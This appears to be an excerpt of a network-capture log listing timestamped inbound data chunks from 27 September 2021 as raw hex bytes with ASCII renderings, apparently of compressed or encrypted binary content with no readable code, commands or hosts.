                                    2021-09-27 16:40:46 UTC104INData Raw: f6 0e 24 88 74 f3 83 98 80 09 8d ff 39 99 26 64 83 72 cb 77 a2 c8 a7 62 72 81 eb eb 26 03 64 df 26 5c 9a 7c 36 77 e6 3e 73 d8 31 98 bd 17 a0 ef e5 17 70 88 51 70 c9 db fb 00 c6 6e a4 87 c7 ba 04 da 4d 69 3f 3b f9 31 e6 c7 99 65 58 17 eb c8 28 79 2d c6 57 78 82 a7 09 eb e4 7c 58 db c0 99 52 5b 03 f2 dc 25 cb 88 93 c9 e9 cc 49 ef 5c bc 7e a1 0d cb 83 63 86 16 68 8c a1 79 5f b1 fa 62 b1 83 8e c6 c7 e0 71 f5 3f 83 1e 17 5b f0 f1 61 89 23 f7 ad c8 12 64 17 49 28 3c e5 10 8b b4 fa 8f 35 eb 5c b7 48 1b 93 14 db 68 f9 cc 02 79 a0 2e 0d 4f cd e3 07 32 e0 15 e9 34 f6 9a 97 13 fa 14 c2 a4 ea 2c d1 35 e3 56 aa 52 08 21 5f 5d c9 05 cd ab 61 dd c7 73 91 2e d3 81 5b fa 66 1f ab 84 a2 86 49 86 ad 35 06 02 2d d9 7a a9 a9 81 80 e8 7e a7 48 e9 e2 a2 0a 55 90 f4 01 01 4f 51
                                    Data Ascii: $t9&drwbr&d&\|6w>s1pQpnMi?;1eX(y-Wx|XR[%I\~chy_bq?[a#dI(<5\Hhy.O24,5VR!_]as.[fI5-z~HUOQ
                                    2021-09-27 16:40:46 UTC105INData Raw: b3 a0 6d 60 d2 2e a0 a9 6d 38 35 5e 49 7b 16 66 33 2a 80 7c 2d 83 98 71 43 e5 01 20 4e 5a d1 92 57 1d 69 17 59 5e 39 e5 13 a4 64 2d d3 72 85 b8 bc 09 0a 15 64 8a 8c 43 54 a4 8e 6b 63 5d f5 f7 3a 04 05 bf bc bb 55 b8 f5 14 fc 57 d9 9e 5f fc fe 30 a8 eb bf be c1 3b 66 af 71 d3 f5 13 58 35 67 c7 e2 89 0c 71 e7 8c db 30 e3 13 51 f0 6f d3 b9 22 f0 0e d2 2f 24 0d 13 cd a4 f1 84 d4 cc 60 42 a6 34 ca 13 b9 21 be 6f b4 56 22 0c b9 c1 d6 e6 5c a6 1d ed 45 c9 ce 05 14 77 98 d5 77 cc 8a 5b 51 21 57 d2 e2 cd 43 a8 92 a5 4a 36 3a 11 90 fe e9 47 81 bc 22 be 00 41 cc e0 86 7e c2 f2 f3 81 c9 1f b3 0b 8b 3d 07 22 47 76 e7 b1 e1 0a e1 f7 1c f3 6e be a9 83 a9 e2 b6 54 b9 89 e3 ca 2f 7e b3 6f 36 96 b8 3b ed e4 92 e3 1a d9 74 ae 36 cc c1 9b 38 c5 69 c1 13 8b 99 d8 75 67 d3 94
                                    Data Ascii: m`.m85^I{f3*|-qC NZWiY^9d-rdCTkc]:UW_0;fqX5gq0Qo"/$`B4!oV"\Eww[Q!WCJ6:G"A~="GvnT/~o6;t68iug
                                    2021-09-27 16:40:46 UTC107INData Raw: c3 03 6e 2d c1 40 9c 83 8b 0a e0 df 7e 5f e5 3e 98 7e 51 14 f9 cd 34 d8 5d 89 e5 ec f0 b5 c5 93 b1 67 82 92 ce 95 97 eb 19 6a 9b aa 79 58 a9 04 23 c6 a9 34 c4 ec 09 ca 81 24 aa be 11 71 80 e8 2b f4 43 f8 a6 e2 ac 7c 3f f8 37 37 8d 52 0b bf fb a1 bf 57 5c bd 5d 76 d6 7f bb 63 d2 e4 b2 4b a4 24 db 5b af 89 80 3d e1 2c 5b 25 f2 a8 0c ae fd 14 c2 6f f1 2a bc a1 82 c2 8f 43 43 0e 5e 78 cc 6a 36 48 61 d7 c9 75 91 22 eb 85 5e e5 6d e1 bb a0 a9 7a 33 82 a0 36 1d 14 26 95 64 f6 27 87 84 f7 65 a3 59 f0 fe 46 f5 78 ac e3 1c 63 03 70 99 c4 c9 72 64 d5 16 9e 88 84 5d b8 d5 f4 9f 0a 72 1a bc 75 ce 8f e6 e6 03 4b e0 f9 c1 c6 9a f1 04 e2 b1 5f b6 cb 52 d0 8c bc a3 78 17 e8 01 02 70 b7 a4 38 34 c5 75 34 70 9b 4f 99 84 ac 1e 0a 74 22 a1 dc ff d8 33 c1 18 32 20 5c 8d 39 44
                                    Data Ascii: n-@~_>~Q4]gjyX#4$q+C|?77RW\]vcK$[=,[%o*CC^xj6Hau"^mz36&d'eYFxcprd]ruK_Rxp84u4pOt"32 \9D
                                    2021-09-27 16:40:46 UTC108INData Raw: 5d e9 33 a0 f5 a1 7c fd 98 c7 af 7b ca d8 56 4d 26 65 cd 2d 91 31 a7 d1 a0 d7 39 60 b2 41 e7 b7 d3 b9 28 37 1d dc 05 35 05 0c 9c 46 f0 a8 c5 c9 1b 5f a7 34 ce 06 24 60 1d 6f 47 57 3d 1d ba c9 d6 f7 4e b9 0b 12 5f d5 c1 14 95 69 80 e6 b9 d3 9d 59 71 d2 42 da fa 39 40 ff ba a7 42 2c c4 16 1b fc e3 60 9e ba 46 90 12 49 c8 d9 be 61 d8 06 d4 af ba 30 a5 dd 83 0a e8 35 4f 70 de 9d fc f4 ea f3 2a f4 79 87 dc fa c9 58 b4 45 bb 9d ed 5b ca 53 a2 6c 41 8a b1 39 92 d6 fd a3 c8 0f 7f 55 29 c7 fa b7 38 d4 6b b1 bb 77 98 fe a7 2e e7 bb b1 d6 e8 1d 05 4d db 65 90 62 3c 04 8c 7b 2a cf 64 2f 87 ed 04 24 ac ac 26 22 58 7a 9b b0 97 04 7b be 26 69 4c d2 70 7c 34 90 24 fe 5f 2f f8 35 56 94 c5 71 a3 e2 b6 3f 8f 39 5c 84 87 5b 97 da 13 88 bc 9f 4c c1 34 dc 76 a1 09 d3 0b e2 02
                                    Data Ascii: ]3|{VM&e-19`A(75F_4$`oGW=N_iYqB9@B,`FIa05Op*yXE[SlA9U)8kw.Meb<{*d/$&"Xz{&iLp|4$_/5Vq?9\[L4v
                                    2021-09-27 16:40:46 UTC109INData Raw: 93 7f a5 97 ef 4b 30 50 0b f1 7f a8 69 e9 ea b7 6a a9 86 03 54 bc 86 76 32 f5 29 5a bb d9 90 b7 ae ee 04 d3 6e e3 22 2f 4e 93 f9 a8 e6 38 26 55 5e d9 15 db d8 4d c2 c7 6a 94 bc c3 85 5a fa 6c cf a8 8c b8 63 60 be a1 36 13 3a 7d c7 65 fc 59 99 9b fb 6d b4 50 fe 9a 56 1a 70 0e 40 09 ce a6 5a 99 c0 cf 15 89 c4 1f 8e e0 22 30 1e dd ef 86 1f 75 1a b1 e2 87 88 7e 6b 1d df c8 e5 b2 b5 94 ee 1e 99 86 51 e9 19 c4 fc 88 bc b3 7a 11 75 8c 11 7e 97 a5 34 1c f6 f9 1f 7a b3 f9 91 99 b5 11 22 dd 24 ba 28 ed fe 33 98 62 1a 2b 5f e6 89 1f 83 40 a7 52 90 4e f9 93 df 4b 66 f3 1a 30 1b 06 2b a5 51 36 e7 9e 3f a8 33 03 0b a5 66 8d 61 39 b8 ec 65 57 08 b5 80 21 c0 77 61 df d8 57 87 cc a6 f0 a6 74 52 dd ea a0 20 8d 55 33 2c 1a 04 d4 1a ff 07 5a ef f7 72 35 4b 51 3f 80 8d 7a 52
                                    Data Ascii: K0PijTv2)Zn"/N8&U^MjZlc`6:}eYmPVp@Z"0u~kQzu~4z"$(3b+_@RNKf0+Q6?3fa9eW!waWtR U3,Zr5KQ?zR
                                    2021-09-27 16:40:46 UTC111INData Raw: fb aa 48 59 2b 55 df d4 39 47 84 9b ac 6a 10 ec 39 11 22 e9 4b b8 b9 21 b7 13 4b cc e9 8e 0c 5d 0c fe ad c1 17 a4 dd 87 22 1c a4 da 76 e3 a3 fc f4 e1 c0 2b fc 79 37 f1 9d ba 05 b6 45 a0 be e4 31 2e 54 b6 42 8f 8f b9 31 c1 e0 fc a3 c6 2a f5 c2 29 c1 d8 9f 31 c0 49 d2 0d 75 9e e3 f4 68 c2 93 87 c5 ee 06 0e 5c db 9d 91 62 3c a4 e6 5a 3f db 74 2f d0 e9 04 28 ac 99 26 22 58 1e 2f c6 fc 0e a5 b3 61 9f 4c d2 70 47 0b bb 14 e5 86 40 12 0d 56 9e e7 be a9 e5 90 2a 8c 5e 1a 80 93 79 45 dd 68 a9 ab 12 4f e9 c0 d9 62 b3 35 df a8 e2 08 ca 5d a1 85 a5 42 b2 46 cd e3 86 79 17 ac 63 f1 39 36 fe 28 11 30 71 da 3c ca 5e 72 ff f8 38 d2 ab 62 41 7e 15 f1 45 c1 94 a5 26 f3 46 e4 62 82 e3 3a 04 a6 8a f2 a5 8d 93 32 87 e0 2a 97 2c 5d b3 6d d4 83 7d e4 ad 4b 22 97 97 ee 27 03 62
                                    Data Ascii: HY+U9Gj9"K!K]"v+y7E1.TB1*)1Iuh\b<Z?t/(&"X/aLpG@V*^yEhOb5]BFyc96(0q<^r8bA~E&Fb:2*,]m}K"'b
                                    2021-09-27 16:40:46 UTC112INData Raw: 42 40 99 fb 7c 7d 41 39 ed 86 18 68 93 fd 35 20 3a 78 88 ca cc 00 e1 1f 14 9f ed 3c 4e b0 07 f7 5a 1f 78 13 60 ba 28 99 a5 03 00 53 f1 cd a3 b5 98 fb 26 c8 9b 5e b0 e7 66 c1 88 ba dd 04 0b 16 0a 8c 6f 9d b3 ea 27 cf e9 15 61 8a 7f 51 88 b6 32 03 65 26 91 34 ef fd 95 74 74 c0 32 4e 9a 1d 27 3a 4a b4 59 9f 56 e3 11 f2 82 61 01 e4 e7 96 27 23 b4 58 fd 3c 9c 37 af 2b 1f 11 ac 98 00 7f 29 9a 14 6f 41 13 b0 8f 38 13 2f c5 f9 de 5a 9f 10 a6 f4 a6 74 ec e8 e2 a8 30 96 81 dd 69 10 2f c1 0c e7 1a 40 df 97 e8 2a 51 40 77 81 8d 70 4b 9b 56 09 2b a1 5d 1e f8 03 45 7b 6f 56 bf e1 c8 6f b2 01 74 81 4e e6 0d 7e 01 5a 7c 97 5d 72 03 f6 53 61 7a c1 14 26 2e 7b 3d 42 e3 82 34 1e f6 a2 ad b4 92 ff 40 54 a2 45 96 1f 4f 42 06 3e 74 23 3f 92 09 54 89 98 6a 24 33 0e de 45 60 f4
                                    Data Ascii: B@|}A9h5 :x<NZx`(S&^fo'aQ2e&4tt2N':JYVa'#X<7+)oA8/Zt0i/@*Q@wpKV+]E{oVotN~Z|]rSaz&.{=B4@TEOB>t#?Tj$3E`
                                    2021-09-27 16:40:46 UTC113INData Raw: 8b 5b 46 3b d3 93 3e 02 6c c1 4b 66 93 f4 68 64 dd a1 78 d7 c4 06 0b 43 eb 46 9c 74 2b 02 df 4b 2a cf 6a 18 40 fa 0f 22 95 83 39 3a ac 14 04 bc 9e 19 73 b1 07 49 9a 43 ac 59 13 89 37 ff 81 3e db 12 5d 6a ce 83 bd e2 f5 c3 89 56 0d 93 5d 46 9d 55 43 af bd 9e 44 f6 cc cb 7d a7 30 fc 14 cc f6 c1 59 2f 8c bd 9e 99 d3 da 35 1d a3 05 25 bb 08 79 cb 0b fa c9 c1 74 c0 3b ae 6e 6b 01 f8 38 d2 ac 66 ba f2 02 2b 57 a7 ce bf 35 f2 9a fd 63 43 e7 e1 2d bd 99 f1 a6 89 40 8b 9f 3f 3d 47 ab 5e 8b 6d d5 85 bc f6 b8 6a 22 86 9d ed 64 fd 61 ec 0e 46 85 aa 2a 60 b4 d3 79 f4 23 84 b1 2a 5e ff c1 0e 7f 9b 4f 6a d8 fb fe 29 0d 8d 72 86 ec 96 0f a9 5e 5b 3c 3d 96 36 f9 ed 6a 6e 58 17 f6 dc 0d 9c 2c ed 4d 97 86 94 3b 9c 16 7d 5f cb 21 97 6d 52 14 e8 d7 3d f0 88 93 c9 e0 e4 42 d3
                                    Data Ascii: [F;>lKfhdxCFt+K*j@"9:sICY7>]jV]FUCD}0Y/5%yt;nk8f+W5cC-@?=G^mj"daF*`y#*^Oj)r^[<=6jnX,M;}_!mR=B
                                    2021-09-27 16:40:46 UTC114INData Raw: 18 c2 17 dd 7b 5d ce 4e a9 c2 02 83 da dd f7 45 b2 14 36 ba e4 e8 36 16 07 7c e7 53 d5 9a 27 a5 20 46 dc 93 e3 40 84 97 b1 98 47 3d 3b 1b f6 e1 22 6d b9 3d b1 0c 6f df fa 8e 70 d3 13 e0 53 c0 3b b7 d5 09 95 1f bf f8 7f ee 6f 26 ca e0 20 e4 0b 66 9e e2 96 ba fb bd 5a a6 68 ee 18 38 55 cd 96 4c 8d bf 39 e1 9e 0b a2 cc 21 e4 83 2b c1 d8 8c 20 c7 6a de 19 7e 87 cc 87 6e ee 9f 97 de f4 78 f1 4b f3 96 8b 5b 29 0d f7 4d 20 d0 20 f9 72 c5 15 21 8d 90 f0 2a 44 04 2c 9a 80 0f a5 b8 11 1f 5f d9 7a 45 07 8f 14 0a 80 03 d9 35 d3 68 30 50 b6 d4 89 32 88 47 00 9b b9 af 4a f4 6e 84 6f 80 77 fa cb d8 67 ac 3e fa f5 e3 24 cb 06 3a 87 a5 4e 89 df d2 ed 9f 7e 06 ba 07 29 03 c8 f5 29 c7 e9 08 37 3a bf 63 63 f7 96 c6 dc ba 6f 2b 7e 06 fa 44 bf c8 bb d8 f8 b6 e1 6f 33 0c 1e 2c
                                    Data Ascii: {]NE66|S' F@G=;"m=opS;o& fZh8UL9!+ j~nxK[)M r!*D,_zE5h0P2GJnowg>$:N~))7:cco+~Do3,
                                    2021-09-27 16:40:46 UTC115INData Raw: c9 57 68 ce d3 65 93 23 f0 6a 5b d6 6c 19 ac b2 5c 78 48 aa bd 25 1c 12 58 c3 7f 08 2c a7 8a f9 0d e0 58 e1 fe 5e 70 3f 81 f7 1a c2 21 6a 8a c5 ce 17 8b ca 1c 61 e6 0d cb b8 df ef 8e 75 37 0a b8 68 32 f5 8c f6 01 57 ff f3 b4 9c ad f0 0e 95 9b 5c ca 88 49 c3 8c aa 9a 76 0b 16 2b 53 38 96 a4 38 3d c3 2e 12 48 16 4e 93 99 bc 13 d0 76 22 b8 20 e9 9b 1d c1 63 1c 5c 19 88 11 1b 92 4e b6 22 cd 5e f2 19 59 82 73 52 48 e7 96 29 3d ad 59 27 91 cc 39 be 26 26 28 ba 4e 90 69 3b c9 be 6f 41 1d 6e 93 1b 99 fb ad b2 ce 56 83 d0 bf f4 39 c7 f6 d7 eb a0 2b 9c 48 0f 07 5d 05 d4 19 ec 09 37 84 40 72 31 3c 2f 9f 80 89 72 69 95 55 c2 f8 b2 47 33 ba fc 44 5d 68 46 dd 31 d9 6a b8 01 7f 86 bb f6 2f a7 00 26 8d 96 4c 71 73 e5 ac 60 5c d0 32 21 10 86 09 bf 1c 81 26 2e 8b 53 43 44
                                    Data Ascii: Whe#j[l\xH%X,X^p?!jau7h2W\Iv+S88=.HNv" c\N"^YsRH)=Y'9&&(Ni;oAnV9+H]7@r1</riUG3D]hF1j/&Lqs`\2!&.SCD
                                    2021-09-27 16:40:46 UTC116INData Raw: 08 f9 79 9c fc 82 b0 14 b7 69 a0 80 ed 4f 6d 53 a2 6e 5a 57 aa 31 fa f4 e3 a8 df 2a 8b 40 24 de c5 6d 39 f8 6b cf 0c 62 4e e7 7d 70 da 80 8b d6 f9 1a 12 b4 f2 bc b7 60 41 42 f6 5c 2f e7 67 05 73 ef 12 2b f0 09 26 22 53 17 53 fb 96 0e a1 3c b9 44 64 e7 7b 54 06 8b 37 f9 81 3e dd 12 45 6a ce 83 a3 f4 92 2e 18 7a 23 9b 93 42 46 d8 79 a2 a2 90 b6 e8 ec df 75 8b 8d e8 1b f1 05 c0 64 37 92 5b 49 b6 d9 d5 f0 81 75 17 a6 13 23 c7 37 d8 0f c7 e6 7f 5b 17 31 7a 64 ec f4 14 cf b7 7a 2e bb 14 dd 42 ba e9 ba 3d ea 97 ec 79 51 ea e1 2d bd 80 fa db 8c 96 1a 93 ef 37 82 2b 75 9a 60 cb 82 5d e5 87 68 1a 2a 68 0d d8 1c 6c d3 0b 4f 83 71 39 81 f1 ec 7b cc 62 72 51 e0 bf f7 fe 05 54 67 5d 43 c2 0e ff 14 37 90 20 30 ec ba 00 d2 2a 4b 3c 3b 9e 27 ee d3 51 e4 5a 06 fb d5 8e 65
                                    Data Ascii: yiOmSnZW1*@$m9kbN}p`AB\/gs+&"SS<Dd{T7>Ej.z#BFyud7[Iu#7[1zdz.B=yQ-7+u`]h*hlOq9{brQTg]C7 0*K<;'QZe
                                    2021-09-27 16:40:46 UTC118INData Raw: 9f 99 5e a7 ca 51 3d 89 90 b4 7e 18 12 1a 3d 7b 97 b5 39 2e 3b f9 33 75 8d 43 88 8a ba 1a 1b 60 3d 44 23 d2 f1 30 df 7f 09 24 5c 98 14 01 7d 4b 98 51 87 48 24 10 77 94 62 2c 0d f7 93 32 22 5b 51 09 e1 86 29 ba ac b9 2f b7 51 90 73 3c b2 ec 6b 5d e7 b9 b2 38 da fd df 66 c3 4b 94 c3 b7 ec 2d de 20 e3 c6 b5 26 b6 4e 0e 7a 1d 0c 58 36 ee 0b 4d a8 95 70 35 4b 4e 80 93 88 7a 52 8f 49 2f fc 9e 55 2e b0 07 45 60 68 48 2e 2a e6 66 cb a9 7a 90 4f fc 1a b7 12 35 99 93 4b 8a 6d c2 51 76 63 d7 19 35 2d 0b fd be e2 a4 27 3a e2 94 ec 44 b7 16 28 cf 71 45 90 3d 74 43 1d 04 62 33 11 9f 66 3e 76 98 60 5a f8 80 69 4c f8 72 41 43 cf 61 d5 02 5d 02 e4 12 a5 1b 36 d0 fc 36 8f 8c 1b 02 1f 76 94 97 bf db 3f 80 e6 dc 6d 34 de b1 0c 02 bf 68 b6 63 98 c2 05 f4 42 c1 74 54 f8 d6 33
                                    Data Ascii: ^Q=~={9.;3uC`=D#0$\}KQH$wb,2"[Q)/Qs<k]8fK- &NzX6Mp5KNzRI/U.E`hH.*fzO5KmQvc5-':D(qE=tCb3f>v`ZiLrACa]66v?m4hcBtT3
                                    2021-09-27 16:40:46 UTC119INData Raw: b2 0f fc 5d f0 6e 40 18 b8 87 f4 81 25 c4 25 95 97 cf a9 be 68 9d 39 88 57 18 a7 96 72 5d ce e4 90 bd 9f 49 4b d1 fb 62 b3 35 df a8 e2 08 ca 61 12 41 a6 48 9c cc 40 e4 8c 75 07 bf 18 22 11 95 f4 05 dc c6 76 cb 3b b5 76 7e f6 ed 3c 1d b9 65 32 52 98 f6 44 ae c2 b6 05 e8 b9 fa 7e d0 c9 1f 2c 90 28 e3 8c 8a 82 0e a0 46 2a 91 2c 61 a3 ae d7 89 a5 f3 26 66 22 97 97 e1 05 12 42 d6 11 c3 ad 7c 27 7e 52 d1 50 e0 26 9b 86 bc a0 fe e7 1c 7c b2 53 5c cd e6 73 3f 06 92 5a 6c f9 ae 2c 79 5e 59 36 13 94 31 e6 cd 6a 6e 49 03 d5 98 02 62 27 e9 6e 84 83 8d 64 6b ef 7c 55 dc 32 ec 6c 59 14 e2 cd 29 a7 64 92 e5 f0 cf 5f c6 bf b5 6c 84 86 19 02 69 ea 34 40 98 a1 79 55 99 e6 21 ea ad 06 4b c0 ea c8 fb 2d 88 af 36 4d eb e7 2b f2 43 f8 a6 42 a2 45 00 3d 7b 36 87 7e 49 aa d8 bf
                                    Data Ascii: ]n@%%h9Wr]IKb5aAH@u"v;v~<e2RD~,(F*,a&f"B|'~RP&|S\s?Zl,y^Y61jnIb'ndk|U2lY)d_li4@yU!K-6M+CBE={6~I
                                    2021-09-27 16:40:46 UTC120INData Raw: d5 cd 41 19 b2 b6 1a ce f9 d0 e1 e7 be 85 c6 bd d5 c1 c1 de e8 c2 14 21 9e 53 27 67 0a 18 c0 35 69 08 4c c1 57 ff 32 41 68 9f 94 99 6e 6b 29 5e d1 f7 9a ca 36 a3 08 56 6b 7c 4c c4 03 e2 6b b8 16 6c 1d 42 f7 03 a5 03 21 9c be fe 74 6c e4 7a 49 75 d2 1f 32 00 e5 f6 40 e9 a4 69 00 fb b8 94 3c 4b e9 29 b6 2e 42 90 37 5f 57 12 20 4f 90 2e 9f 6c 2a a3 64 64 4b fc 16 53 48 76 c5 96 47 36 67 20 99 5e 55 e6 13 a8 bb 20 f1 65 a9 89 ae 1a 04 b7 64 a1 84 a9 41 a0 20 68 6b 4f 0b 43 b1 06 0f 9d b9 a4 46 b6 e6 1e e6 6d e5 8a 5c d0 e4 09 46 0a 4a 97 37 be 76 8a 85 d6 dd 0c 4d 3d 00 90 f3 81 1e 53 95 56 d6 33 6b b7 58 de 9c c2 a3 0a be 1f da 29 1d 2b 0e dd 5c 9f d0 c5 c9 11 77 a8 36 ce 00 b8 96 1c 6f b2 45 2b 0c bc a6 2a f6 54 bf 1d 7c 95 e7 c4 1e 7e 94 81 e6 55 c5 f2 99
                                    Data Ascii: A!S'g5iLW2Ahnk)^6Vk|LklB!tlzIu2@i<K).B7_W O.l*ddKSHvG6g ^U edA hkOCFm\FJ7vM=SV3kX)+\w6oE+*T|~U
                                    2021-09-27 16:40:46 UTC121INData Raw: 74 31 6d 3e f4 44 a8 eb 81 26 f9 90 c4 59 5c f6 15 15 4d 8a f2 af 81 9d 09 9f e5 3b 86 3c 8b 8a 41 de f7 30 e4 ab 6b 31 93 8d e1 30 03 71 d7 19 6f 6c 7d 0b 6b e1 ce 0c b8 33 8f aa 0e af d6 f1 0a 54 70 43 57 d4 d1 ed 2f 06 83 4c 67 f9 44 05 f6 7f 48 35 2a 8f 26 30 a8 92 67 58 0c 92 44 02 62 27 d9 2f 0e 82 8b 01 9c 66 7d 5f c7 2d 9c 61 4c 07 ee dc 33 c4 69 81 1b ea cb 55 d5 b6 a2 75 e6 79 cb 83 63 85 b2 69 8c ab 61 30 39 fb 22 e0 c4 96 c7 c7 e0 c4 e5 2a b8 a9 15 4a ed f5 2b 1d 42 d4 a6 f1 b9 77 01 72 e4 28 ae 69 fc bb ea b0 88 ff a2 bc 7b 04 f9 56 34 66 f8 ee 9b 54 a1 24 12 45 b8 9a 70 3d f0 2a 53 c8 f7 bc be 97 6f e9 3d 81 ea 3c a0 48 83 ff 97 5e 20 d8 5e 54 c2 0c f4 43 60 dd d6 7a 9b 35 fc 94 4b ed 79 36 44 8d 94 72 59 be b6 e0 0a 06 56 ec 76 e1 2d 9a 8c
                                    Data Ascii: t1m>D&Y\M;<A0k10qol}k3TpCW/LgDH5*&0gXDb'/f}_-aL3iUuycia09"*J+Bwr(i{V4fT$Ep=*So=<H^ ^TC`z5Ky6DrYVv-
                                    2021-09-27 16:40:46 UTC123INData Raw: 52 61 6a d2 19 25 28 14 f7 40 7e 88 25 11 8a ad bc bb 42 eb 2f a0 ac 45 90 37 44 43 06 35 7c 03 27 9f 3c 3f 8b 98 65 4a fa 1f dc 45 74 d3 f8 b5 14 76 09 90 29 31 ec 11 b9 76 39 d3 72 8b ad aa 32 9e 15 75 88 b8 db 54 88 89 65 18 63 22 df bb 15 01 a4 b2 b2 6e 98 f1 05 f2 5f 40 67 5e d0 ef 20 a6 e5 b3 7e ea 12 75 a9 6f d4 d8 c5 4c 26 65 d6 f7 95 3c a6 e2 a0 d1 24 e0 a3 4b cf 8e c0 bf 33 ef 0b cd a3 be 05 0c dc f8 e1 ae d1 dd 33 96 a6 34 c4 17 d3 75 35 45 b0 56 3b 0a 27 ce d6 f7 55 aa 0d 02 42 f3 c0 b6 00 6e 94 f2 7b 1a 9c 48 53 30 42 ce d4 18 46 84 9b b1 cf 2f ec 39 1a ef ef 5c 94 ae 2a 3b 9f 49 cc f0 2c 70 de 18 e6 85 08 16 a4 d7 96 26 08 19 63 72 f6 bf ea 79 e7 db 1b f5 6d 99 e5 b5 19 ea b6 4f a5 be 52 37 2e 54 bb e7 4a 8d b9 3a fa f7 ed a5 da 2e 29 40 2f
                                    Data Ascii: Raj%(@~%B/E7DC5|'<?eJEtv)1v9r2uTec"n_@g^ ~uoL&e<$K334u5EV;'UBn{HS0BF/9\*;I,p&crymOR7.TJ:.)@/
                                    2021-09-27 16:40:46 UTC124INData Raw: 08 d2 72 1e 3e 3e 0b 86 9b 43 78 65 5c 04 ff b8 87 63 2d c5 68 de 81 8b 01 8e 6c 7d 5f c9 3b 8e 7c 22 97 f8 dc 26 d1 0d 16 e4 eb e3 63 29 bd b3 75 8b 97 47 34 14 6c 34 68 88 a3 7b 24 37 fb 22 ee 83 47 c4 c7 e0 b5 7f 3f ab ba 3f 5b fa f9 33 e1 43 c5 ad e0 b3 6f 16 43 26 21 94 7e d3 94 fa a7 97 e9 4d b9 40 f5 f0 52 b8 7f eb e0 a1 6a a4 3e ec 5b 83 87 65 46 9e 3c 4d 32 de c7 b5 af f7 0f d1 7a f5 24 b7 42 7d ef ac 4f 3a 5d dc 79 c8 01 e5 1f 63 dd dc 7b 91 22 eb 85 5e e5 6c e1 bb a0 b7 7a 33 2b a0 36 1d 3a 1e c4 65 fc 32 80 88 ff 76 b6 5d fa 04 5d 27 6d 82 8c 9d 19 2b 75 e7 b2 cf 06 84 fd 6f 9e e7 3e 54 a4 cc eb 8c 1f 76 12 46 6d 1c 88 cc db e0 49 e4 e1 b2 a5 9c ee 05 61 98 72 a3 cd 33 46 89 bc b6 02 79 17 00 24 56 ee a5 3c 3e c8 e7 13 63 9f 4e 82 9d a0 16 f4
                                    Data Ascii: r>>Cxe\c-hl}_;|"&c)uG4l4h{$7"G??[3CoC&!~M@Rj>[eF<M2z$B}O:]yc{"^lz3+6:e2v]]'m+uo>TvFmIar3Fy$V<>cN
                                    2021-09-27 16:40:46 UTC125INData Raw: b1 02 1a b8 2c 83 6b bf d3 1a f9 68 43 60 5e d0 f1 39 88 d9 b7 68 ef 9a 0a d1 e2 c1 f0 08 52 28 f5 e2 de 8e 32 90 e8 80 4f 33 6d a4 54 c5 a7 fe bb 22 ef 37 b4 51 ac 04 0c d9 45 ff 32 e0 e4 14 79 b8 3b ee a4 d7 61 1d 70 a6 7e 10 1f aa cf fc 99 2a 20 0a 13 40 fa d4 8e 34 45 8f c0 4c c3 bd fc 59 21 46 c5 ef 1b 6f 86 9d a0 68 42 92 a0 1a fc ed 52 83 22 18 9a 1d 6f d3 e0 ae a6 d8 0c f2 b5 e9 3a a6 dd 81 08 76 4f d6 77 f6 bd e3 e6 7a fe 36 fa 5f 92 e3 bd 73 ea b6 45 ac be c2 36 2e 54 88 04 33 14 b8 3b ed ee ef 39 e9 0a 84 77 36 d2 f2 43 38 d4 61 c1 19 5d b5 f6 79 69 e8 f9 f8 4f e9 17 0c 55 e7 0a b1 4f 34 20 e8 48 0b 2e 60 07 73 f4 2c 0f 86 88 20 08 3c 6b b1 b3 97 0a ba a7 94 7b 61 dd 5c 4b 19 b0 cc f4 81 2f cf 02 7e b9 cd af af cf f4 47 11 57 0b 80 98 47 d1 fd
                                    Data Ascii: ,khC`^9hR(2O3mT"7QE2y;ap~* @4ELY!FohBR"o:vOwz6_sE6.T3;9w6C8a]yiOUO4 H.`s, <k{a\K/~GWG
                                    2021-09-27 16:40:46 UTC127INData Raw: 0a cb 6e fa ac e6 99 0c 69 da 36 37 83 65 d6 21 de 8a 99 cf 43 80 77 a4 f3 7e bb 70 d0 c9 a3 7b a6 0e 78 24 36 88 67 39 fe 03 d7 13 db 9e 91 b0 c3 34 72 7c f5 35 a4 77 ae ec 80 47 12 4c 21 e1 c9 05 c9 57 5e 47 f3 48 8c 00 f4 ab 7a 4b 64 1f ba 90 90 55 4a aa a7 1c 77 6c d0 c7 65 f2 32 cb 01 de 5b a8 7f fe ba 7c bc 7b 80 f7 01 0b 03 5c 9b c0 c8 2c e0 ab 8f 9e e7 30 40 f9 45 ca a1 01 54 14 f9 4c fa 8c ca f7 1e 58 df c8 b0 b4 9e db 60 e1 00 5f b6 cb 57 81 12 99 9f 73 2d 09 42 0e ab 95 a4 3c 2b ca d0 32 72 9b 48 b9 f7 c1 83 0b 65 22 a5 61 64 d1 36 cc 45 05 62 7c 6d 13 1f 83 55 b8 71 a3 5d f2 1b 42 f7 0f b0 0c e6 92 32 6f 3f 75 08 e4 a9 27 fa 02 fe 1f bb 4e 81 48 14 b0 fd 68 6b 73 c6 07 31 cb fd c9 b2 55 73 aa c8 91 e2 6d e3 2b e0 ea a0 3a b6 74 09 7a 1d 2e ba
                                    Data Ascii: ni67e!Cw~p{x$6g94r|5wGL!W^GHzKdUJwle2[|{\,0@ETLX`_Ws-B<+2rHe"ad6Eb|mUq]B2o?u'NHhks1Usm+:tz.
                                    2021-09-27 16:40:46 UTC128INData Raw: fc 99 2a 20 0a 13 40 fa a8 8e 34 45 8f c0 4c bf bd bb 5d 21 46 c5 e9 1b 6f 86 9d a0 68 42 92 a0 1a fc ed 52 ff 22 18 9a 1d 6f d3 9c ae 69 dd 0c f2 b1 e9 3a a6 dd 81 08 72 4f d6 77 f6 bd e3 9a 7a fe 36 fb 5f 92 9f bd b4 ef b6 45 ae 86 c7 19 2c 52 a4 40 27 f3 20 3a e9 f5 e3 cc 56 02 a6 5f 0f de bd b3 26 d1 61 de 15 5d b5 f6 79 69 e8 fd f8 4f e9 17 0c 55 83 0a b1 4f 35 20 e8 2c 0b ea 65 07 73 f6 15 0a a9 8a 26 24 78 7f 56 2b 96 0e a1 ad 7f c4 69 ff 74 72 13 e1 04 c2 84 2f d0 10 7e b9 cd af af cf f4 47 11 57 0b 80 98 23 d1 fd 45 a0 9b 80 3a c9 fd dd 76 a7 3e ee 23 cf 0a c0 73 10 eb db d1 9b da c9 fc ff ef 23 86 03 10 26 45 d4 53 d3 ee 67 d4 36 97 48 70 ff ff 3e b0 c4 fc 35 45 11 ee 30 34 e6 88 29 df 85 98 48 3f f3 1f 2c 8e 9d da 82 9c 96 1c a2 8f 54 08 27 75
